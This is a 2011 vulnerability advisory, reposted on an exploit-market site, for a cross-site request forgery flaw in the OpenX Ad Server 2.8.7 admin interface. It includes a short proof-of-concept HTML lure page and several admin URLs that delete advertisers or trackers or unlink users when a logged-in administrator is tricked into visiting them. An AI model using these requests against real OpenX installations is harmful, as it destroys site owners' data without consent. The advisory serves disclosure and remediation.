[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenX Ad Server 2.8.7 Cross Site Request Forgery

Author
Narendra Shinde
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16562
Category
web applications
Date add
26-07-2011
Platform
php
=======================================================================
 Title: OpenX Ad Server CSRF Vulnerability
 Product: OpenX Ad Server
 Vulnerable version: 2.8.7 and probably earlier versions
 Fixed version: N/A
 Impact: High
 Homepage: http://www.openx.org/
 Vulnerability ID: SV-01
 Found: 7/7/2011
Tested on : Ubuntu 11.04
By: Narendra Shinde
      Secur-I Research Group
      http://securview.com/
=======================================================================
 
Vendor description:
-------------------
OpenX is the world�s leading independent provider of digital advertising technology that enables businesses to manage and maximize their ad revenue.
 
OpenX ad serving products are used by more than 200,000 websites in more than 100 countries and serve more than 350 billion ads monthly. OpenX Market reaches more than 400 million monthly unique users worldwide
 
Source: http://www.openx.org/about/facts
 
 
Vulnerability Information:
-------------------------
Class: Cross-Site Request Forgery (CSRF) [CWE-352]
Impact: Unintentional changes in application.
Remotely Exploitable: Yes
Authentication Required: No
User interaction Required : Yes
CVE Name: N/A
 
Vulnerability overview/description:
-----------------------------------
The administrative interface of OpenX Ad Server is vulnerable to Cross-Site Request Forgery (CSRF) attacks, which can be exploited by remote attackers to force a logged-in administrator to perform malicious actions on the OpenX Ad Server, by enticing authenticated user to visit a malicious web page.Attacker can modify application data.
 
 
 
Proof of concept:
-----------------
Code:
 
<html>
<body>
<h1> Check This new Snap </h1>
<a href=�http://vulnerablewebsite/www/admin/advertiser-delete.php?clientid=2> Check This </a>
</body>
</html>
 
 
 
 
The following URL could be used to perform CSRF attacks:
 
http://vulnerablewebsite/www/admin/advertiser-delete.php?clientid=[valid-id]
 
http://vulnerablewebsite/www/admin/advertiser-user-unlink.php?userid=[valid-id]&clientid[valid-id]
 
http://vulnerablewebsite/www/admin/tracker-delete.php?clientid[valid-id]&trackerid[valid-id]



#  0day.today [2024-12-25]  #